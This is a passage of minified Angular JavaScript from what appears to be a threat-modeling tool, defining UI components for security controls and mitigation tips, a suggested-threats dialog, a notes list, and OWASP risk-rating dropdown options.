e=i=>{var n,r;(null===(n=i.ThreatRules)||void 0===n?void 0:n.length)>0&&this.threatRuleGroups.push({Name:i.Name,ThreatRules:i.ThreatRules}),(null===(r=i.SubGroups)||void 0===r?void 0:r.length)>0&&i.SubGroups.forEach(c=>e(c))};return this.dataService.Config.GetThreatRuleGroups().forEach(i=>e(i)),this.threatRuleGroups}GetControlGroups(){return this.dataService.Config.GetControlGroups()}GetControlGroup(){return this.dataService.Config.FindGroupOfControl(this.control)}OnControlGroupChanged(e){let i=this.dataService.Config.FindGroupOfControl(this.control);i&&i.RemoveControl(this.control),e.value.AddControl(this.control)}AddTip(){this.control.MitigationTips.push({Name:Gi.FindUniqueName("Tip",this.control.MitigationTips.map(e=>e.Name)),Description:"",LifeCycles:[]}),this.selectedMitigationTip=this.control.MitigationTips[this.control.MitigationTips.length-1]}DeleteTip(e){const i=this.control.MitigationTips.indexOf(e);i>=0&&(this.control.MitigationTips.splice(i,1),e==this.selectedMitigationTip&&(this.selectedMitigationTip=null))}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}ContainsLifeCycle(e){return this.selectedMitigationTip.LifeCycles.includes(e)}SetLifeCycle(e,i){i.checked?this.selectedMitigationTip.LifeCycles.push(e):this.selectedMitigationTip.LifeCycles.splice(this.selectedMitigationTip.LifeCycles.findIndex(n=>n==e),1)}GetLifeCycleNames(e){return 0==e.LifeCycles.length?"-":e.LifeCycles.map(i=>this.translate.instant(this.GetLifeCycleName(i))).join(", ")}GetLifeCycles(){return y2.GetMitigationKeys()}GetLifeCycleName(e){return y2.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Wg,8),Ee(hf,8),Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-control"]],inputs:{node:"node",control:"control",canEdit:"canEdit",canEditName:"canEditName",canEditGroup:"canEditGroup"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill","class","property-form-field",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["multiple","",3,"value","valueChange"],[3,"label",4,"ngFor","ngForOf"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngFor","ngForOf"],["appearance","fill",1,"property-form-field"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"value","matTooltip","selectionChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],[3,"label"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[2,"margin-top","10px"],[2,"text-align","center"],["style","padding: 0 3px 0 3px;",4,"ngFor","ngForOf"],["style","text-align: center;",4,"ngFor","ngForOf"],[2,"padding","0 3px 0 3px"],["color","primary",3,"checked","change"],["matExpansionPanelContent",""],[3,"canEdit","attackVector"],[3,"canEdit","threatRule"]],template:function(e,i){1&e&&ne(0,kke,74,34,"div",0),2&e&&V("ngIf",i.control)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();function Pke(t,a){1&t&&(m(0,"mat-icon"),s(1,"check_circle_outline"),u())}function Oke(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n        "),m(2,"td"),s(3,"\n          "),ne(4,Pke,2,0,"mat-icon",4),s(5,"\n        "),u(),s(6,"\n        "),m(7,"td",5),s(8,"\n          "),m(9,"span",6),s(10),u(),it(11,"br"),s(12),u(),s(13,"\n        "),m(14,"td"),s(15,"\n          "),m(16,"button",7),he("click",function(){const r=be(e).$implicit;return Me(B(2).AddThreat(r))}),s(17),oe(18,"translate"),u(),s(19,"\n        "),u(),s(20,"\n      "),u()}if(2&t){const e=a.$implicit,i=B(2);C(4),V("ngIf",i.HasThreat(e)),C(6),ke(e.Name),C(2),ct("",e.Description,"\n        "),C(5),ke(re(18,4,"general.Add"))}}function Nke(t,a){if(1&t){const e=Ye();m(0,"button",8),he("click",function(){return be(e),Me(B(2).PrevStep())}),s(1,"Previous"),u()}}function Lke(t,a){if(1&t){const e=Ye();m(0,"button",8),he("click",function(){return be(e),Me(B(2).NextStep())}),s(1,"End"),u()}}function zke(t,a){if(1&t){const e=Ye();m(0,"button",8),he("click",function(){return be(e),Me(B(2).NextStep())}),s(1,"Next"),u()}}function Wke(t,a){if(1&t){const e=Ye();m(0,"mat-expansion-panel",1),he("opened",function(){const r=be(e).index;return Me(B().SetStep(r))}),s(1,"\n    "),m(2,"mat-expansion-panel-header"),s(3,"\n      "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n    "),u(),s(7,"\n\n    "),m(8,"table"),s(9,"\n      "),ne(10,Oke,21,6,"tr",2),s(11,"\n    "),u(),s(12,"\n\n    "),m(13,"mat-action-row"),s(14,"\n      "),ne(15,Nke,2,0,"button",3),s(16,"\n      "),ne(17,Lke,2,0,"button",3),s(18,"\n      "),ne(19,zke,2,0,"button",3),s(20,"\n    "),u(),s(21,"\n  "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.first,r=a.last;V("expanded",B().step===i),C(5),za("\n        ",e[0].Name," (",e[1].length,")\n      "),C(5),V("ngForOf",e[1]),C(5),V("ngIf",!n),C(2),V("ngIf",r),C(2),V("ngIf",!r)}}let Fke=(()=>{class t{constructor(e,i,n){this.dataService=i,this.threatEngine=n,this.step=0,this.mnemonicArray=[],this.hasThreatBuffer={},this.element=e,this.dataService.Config.GetStencilThreatMnemonics().forEach(r=>{const c=r.Letters.filter(d=>{var T;return d.AffectedElementTypes.includes(null===(T=this.element.GetProperty("Type"))||void 0===T?void 0:T.ElementTypeID)});c.length>0&&this.mnemonicArray.push([r,c])})}ngOnInit(){}AddThreat(e){this.hasThreatBuffer[e.ID]=!0,this.threatEngine.AddMnemonicThreat(this.element,e).subscribe(i=>{i||(this.hasThreatBuffer[e.ID]=null)})}HasThreat(e){return null==this.hasThreatBuffer[e.ID]&&(this.hasThreatBuffer[e.ID]=this.dataService.Project.GetAttackScenarios().filter(i=>i.Target==this.element).filter(i=>i.ThreatMnemonicLetterID==e.ID).length>0),this.hasThreatBuffer[e.ID]}SetStep(e){this.step=e}NextStep(){this.step++}PrevStep(){this.step--}}return t.\u0275fac=function(e){return new(e||t)(Ee(lc,8),Ee(Yi),Ee(RT))},t.\u0275cmp=Wt({type:t,selectors:[["app-suggested-threats-dialog"]],decls:4,vars:1,consts:[[3,"expanded","opened",4,"ngFor","ngForOf"],[3,"expanded","opened"],[4,"ngFor","ngForOf"],["mat-button","",3,"click",4,"ngIf"],[4,"ngIf"],[2,"width","100%"],[2,"font-size","large"],["mat-raised-button","",3,"click"],["mat-button","",3,"click"]],template:function(e,i){1&e&&(m(0,"mat-accordion"),s(1,"\n  "),ne(2,Wke,22,7,"mat-expansion-panel",0),s(3,"\n"),u()),2&e&&(C(2),V("ngForOf",i.mnemonicArray))},dependencies:[Zi,Ri,oa,da,il,Ec,E8,Dc,tl,Xi]}),t})();const Vke=["newNote"],Bke=["ctxMenu"];function Hke(t,a){if(1&t){const e=Ye();m(0,"td")(1,"mat-checkbox",14),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.IsChecked=n)}),u()()}if(2&t){const e=B(2).$implicit;C(1),V("ngModel",e.IsChecked)}}function Uke(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B(3).$implicit;C(1),ct(" - ",e.Author,"")}}function qke(t,a){if(1&t&&(m(0,"td")(1,"span",15),s(2),oe(3,"localDateTime"),ne(4,Uke,2,1,"ng-container",11),s(5,": "),u()()),2&t){const e=B(2).$implicit;C(2),ke(re(3,2,e.Date)),C(2),V("ngIf",(null==e.Author?null:e.Author.length)>0)}}function Gke(t,a){if(1&t&&(m(0,"td")(1,"span",15),s(2),u()()),2&t){const e=B(2).index;C(2),ct("",e+1,". ")}}const VG=function(t){return{item:t}};function jke(t,a){if(1&t&&(m(0,"td"),s(1,"\n          "),m(2,"button",16),oe(3,"translate"),s(4,"\n            "),m(5,"mat-icon"),s(6,"more_vert"),u(),s(7,"\n          "),u(),s(8,"\n        "),u()),2&t){const e=B(2).$implicit;B();const i=Ti(15);C(2),at("matTooltip",re(3,3,"general.More")),V("matMenuTriggerFor",i)("matMenuTriggerData",fr(5,VG,e))}}function Qke(t,a){if(1&t){const e=Ye();m(0,"table"),s(1,"\n      "),m(2,"tr"),s(3,"\n        "),m(4,"td")(5,"mat-icon"),s(6,"arrow_right"),u()(),s(7,"\n        "),ne(8,Hke,2,1,"td",11),s(9,"\n        "),ne(10,qke,6,4,"td",11),s(11,"\n        "),ne(12,Gke,3,1,"td",11),s(13,"\n        "),m(14,"td"),s(15),u(),s(16,"\n        "),ne(17,jke,9,7,"td",11),s(18,"\n        "),m(19,"td"),s(20,"\n          "),m(21,"button",13),he("click",function(){be(e);const n=B().index;return Me(B().isEdtingArray[0][n]=!0)}),oe(22,"translate"),s(23,"\n            "),m(24,"mat-icon"),s(25,"edit"),u(),s(26,"\n          "),u(),s(27,"\n        "),u(),s(28,"\n        "),m(29,"td"),s(30,"\n          "),m(31,"button",13),he("click",function(){be(e);const n=B().$implicit;return Me(B().OnDeleteItem(n))}),oe(32,"translate"),s(33,"\n            "),m(34,"mat-icon"),s(35,"delete"),u(),s(36,"\n          "),u(),s(37,"\n        "),u(),s(38,"\n      "),u(),s(39,"\n    "),u()}if(2&t){const e=B().$implicit,i=B();C(8),V("ngIf",e.HasCheckbox),C(2),V("ngIf",e.ShowTimestamp),C(2),V("ngIf",i.enumerateItems),C(3),ke(e.Note),C(2),V("ngIf",i.canToggleCheckbox||i.canToggleTimestamp),C(4),at("matTooltip",re(22,7,"general.Edit")),C(10),at("matTooltip",re(32,9,"general.Delete"))}}function $ke(t,a){if(1&t){const e=Ye();m(0,"input",17),he("keydown",function(n){be(e);const r=B().index;return Me(B().OnRenameItem(n,0,r))})("focusout",function(n){be(e);const r=B().index;return Me(B().OnRenameItem(n,0,r))}),u()}if(2&t){const e=B().$implicit;V("spellcheck",B().dataService.HasSpellCheck)("ngModel",e.Note)}}function Kke(t,a){if(1&t){const e=Ye();m(0,"div",10),he("contextmenu",function(n){const r=be(e),c=r.$implicit,d=r.index;return Me(B().OpenContextMenu(n,c,d))}),s(1,"\n    "),ne(2,Qke,40,11,"table",11),s(3,"\n    "),ne(4,$ke,1,2,"input",12),s(5,"\n  "),u()}if(2&t){const e=a.index,i=B();ri("color",i.theme.IsDarkMode?"white":"black"),C(2),V("ngIf",!i.isEdtingArray[0][e]),C(2),V("ngIf",i.isEdtingArray[0][e])}}function Xke(t,a){if(1&t){const e=Ye();m(0,"button",19),s(1,"\n      "),m(2,"mat-slide-toggle",20),he("ngModelChange",function(n){return be(e),Me(B().item.HasCheckbox=n)})("click",function(n){return n.stopPropagation()}),s(3),oe(4,"translate"),u(),s(5,"\n    "),u()}if(2&t){const e=B().item;C(2),V("ngModel",e.HasCheckbox),C(1),ct("\n        ",re(4,2,"dialog.notes.hasCheckbox"),"\n      ")}}function Yke(t,a){if(1&t){const e=Ye();m(0,"button",19),s(1,"\n      "),m(2,"mat-slide-toggle",20),he("ngModelChange",function(n){return be(e),Me(B().item.ShowTimestamp=n)})("click",function(n){return n.stopPropagation()}),s(3),oe(4,"translate"),u(),s(5,"\n    "),u()}if(2&t){const e=B().item;C(2),V("ngModel",e.ShowTimestamp),C(1),ct("\n        ",re(4,2,"dialog.notes.showTimestamp"),"\n      ")}}function Jke(t,a){if(1&t&&(s(0,"\n    "),ne(1,Xke,6,4,"button",18),s(2,"\n    "),ne(3,Yke,6,4,"button",18),s(4,"\n  ")),2&t){const e=B();C(1),V("ngIf",e.canToggleCheckbox),C(2),V("ngIf",e.canToggleTimestamp)}}function Zke(t,a){if(1&t&&(m(0,"button",23),s(1,"\n        "),m(2,"mat-icon"),s(3,"more_vert"),u(),s(4,"\n        "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n      "),u()),2&t){const e=B(2).item;B(),V("matMenuTriggerFor",Ti(15))("matMenuTriggerData",fr(5,VG,e)),C(6),ke(re(7,3,"general.More"))}}function e9e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),ne(2,Zke,9,7,"button",21),s(3,"\n      "),m(4,"button",22),he("click",function(){be(e);const n=B().index;return Me(B().isEdtingArray[0][n]=!0)}),s(5,"\n        "),m(6,"mat-icon"),s(7,"edit"),u(),s(8,"\n        "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n      "),u(),s(13,"\n      "),m(14,"button",22),he("click",function(){be(e);const n=B().item;return Me(B().OnDeleteItem(n))}),s(15,"\n        "),m(16,"mat-icon"),s(17,"delete"),u(),s(18,"\n        "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n      "),u(),s(23,"\n    "),Mt()}if(2&t){const e=B(2);C(2),V("ngIf",e.canToggleCheckbox||e.canToggleTimestamp),C(8),ke(re(11,3,"general.Edit")),C(10),ke(re(21,5,"general.Delete"))}}function t9e(t,a){if(1&t&&(s(0,"\n    "),ne(1,e9e,24,7,"ng-container",11),s(2,"\n  ")),2&t){const e=a.item;C(1),V("ngIf",e)}}let jp=(()=>{class t{constructor(e,i,n){this.theme=i,this.dataService=n,this.showTimestamp=!0,this.hasCheckbox=!1,this.canToggleCheckbox=!1,this.canToggleTimestamp=!1,this.enumerateItems=!1,this.isEdtingArray=[[],[]],this.menuTopLeftPosition={x:"0",y:"0"},e&&(this.showTimestamp=e.ShowTimestamp,this.hasCheckbox=e.HasCheckbox,this.canToggleCheckbox=e.CanToggleCheckbox,this.canToggleTimestamp=e.CanToggleTimestamp,this.notes=e.Notes)}get notes(){return this._notes}set notes(e){this.checkForUnsavedChanges(),this._notes=e,this._strings=null==e?void 0:e.map(i=>i.Note)}get strings(){return this._strings}set strings(e){this.checkForUnsavedChanges(),this._strings=e,this._notes=[],null==e||e.forEach(i=>{this._notes.push({Author:"",Date:"",ShowTimestamp:this.showTimestamp,HasCheckbox:this.hasCheckbox,IsChecked:!1,Note:i})})}ngOnInit(){}ngOnDestroy(){this.checkForUnsavedChanges()}OnDeleteItem(e){const i=this.notes.indexOf(e);i>=0&&(this.notes.splice(i,1),this.strings.splice(i,1))}OnRenameItem(e,i,n){("Enter"===e.key||"focusout"===e.type)&&(this.notes[n].Note=e.target.value,this.strings[n]=e.target.value,this.isEdtingArray[i][n]=!1)}OnKeyDown(e){"Enter"==e.key&&(this.addNote(e.target.value),e.target.value="")}OpenContextMenu(e,i,n){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i,index:n},this.matMenuTrigger.openMenu()}drop(e){Qs(this.notes,e.previousIndex,e.currentIndex),Qs(this.strings,e.previousIndex,e.currentIndex)}addNote(e){this.notes.push({Date:Date.now().toString(),Author:this.dataService.UserDisplayName,Note:e,ShowTimestamp:this.showTimestamp,HasCheckbox:this.hasCheckbox,IsChecked:!1}),this.strings.push(e)}checkForUnsavedChanges(){var e,i;if((null===(i=null===(e=this.newNote)||void 0===e?void 0:e.nativeElement)||void 0===i?void 0:i.value.length)>0){const n=this.notes,r=this.strings,c=this.newNote.nativeElement.value;setTimeout(()=>{n.push({Date:Date.now().toString(),Author:this.dataService.UserDisplayName,Note:c,ShowTimestamp:this.showTimestamp,HasCheckbox:this.hasCheckbox,IsChecked:!1}),r.push(c)},10),this.newNote.nativeElement.value=null}}}return t.\u0275fac=function(e){return new(e||t)(Ee(S5,8),Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-notes"]],viewQuery:function(e,i){if(1&e&&(Mi(Vke,5),Mi(Bke,5)),2&e){let n;Vt(n=Bt())&&(i.newNote=n.first),Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{notes:"notes",strings:"strings",showTimestamp:"showTimestamp",hasCheckbox:"hasCheckbox",canToggleCheckbox:"canToggleCheckbox",canToggleTimestamp:"canToggleTimestamp",enumerateItems:"enumerateItems"},decls:29,vars:10,consts:[["cdkDropList","",1,"reorder-list",3,"cdkDropListDropped"],["class","reorder-box","cdkDrag","",3,"color","contextmenu",4,"ngFor","ngForOf"],[2,"padding","5px 10px"],["matInput","",2,"width","calc(100% - 24px)","vertical-align","super","font-size","14px",3,"spellcheck","placeholder","keydown"],["newNote",""],["moreMenu","matMenu"],["matMenuContent",""],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["cdkDrag","",1,"reorder-box",3,"contextmenu"],[4,"ngIf"],["id","renameBox","type","text","style","width: -webkit-fill-available;","autofocus","","onfocus","this.select();",3,"spellcheck","ngModel","keydown","focusout",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"width","20px","height","20px","line-height","20px",3,"matTooltip","click"],["color","primary",2,"padding-right","5px",3,"ngModel","ngModelChange"],[2,"padding-right","5px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"width","20px","height","20px","line-height","20px",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],["id","renameBox","type","text","autofocus","","onfocus","this.select();",2,"width","-webkit-fill-available",3,"spellcheck","ngModel","keydown","focusout"],["mat-menu-item","",4,"ngIf"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngIf"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"]],template:function(e,i){if(1&e&&(m(0,"div",0),he("cdkDropListDropped",function(r){return i.drop(r)}),s(1,"\n  "),ne(2,Kke,6,4,"div",1),s(3,"\n"),u(),s(4,"\n"),m(5,"div",2),s(6,"\n  "),m(7,"mat-icon"),s(8,"arrow_right"),u(),m(9,"input",3,4),he("keydown",function(r){return i.OnKeyDown(r)}),oe(11,"translate"),u(),s(12,"\n"),u(),s(13,"\n"),m(14,"mat-menu",null,5),s(16,"\n  "),ne(17,Jke,5,2,"ng-template",6),s(18," \n"),u(),s(19,"\n"),it(20,"div",7,8),s(22," \n"),m(23,"mat-menu",null,9),s(25," \n  "),ne(26,t9e,3,1,"ng-template",6),s(27," \n"),u(),s(28," \n\n")),2&e){const n=Ti(24);C(2),V("ngForOf",i.notes),C(7),at("placeholder",re(11,8,"pages.modeling.charscope.addDescription")),V("spellcheck",i.dataService.HasSpellCheck),C(11),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,Sd,kd,oa,br,da,Xa,Xo,qo,po,el,Pa,Mg,Xi,E5],styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function i9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.sl"+e.toString()))}}function a9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.ed"+e.toString()))}}function n9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.lc"+e.toString()))}}function o9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.fd"+e.toString()))}}function r9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.m"+e.toString()))}}function s9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.ee"+e.toString()))}}function c9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.li"+e.toString()))}}function l9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.rd"+e.toString()))}}function d9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.o"+e.toString()))}}function m9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.a"+e.toString()))}}function u9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.lav"+e.toString()))}}function h9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.nc"+e.toString()))}}function f9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.s"+e.toString()))}}function p9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.id"+e.toString()))}}function _9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.lac"+e.toString()))}}function g9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.pv"+e.toString()))}}const 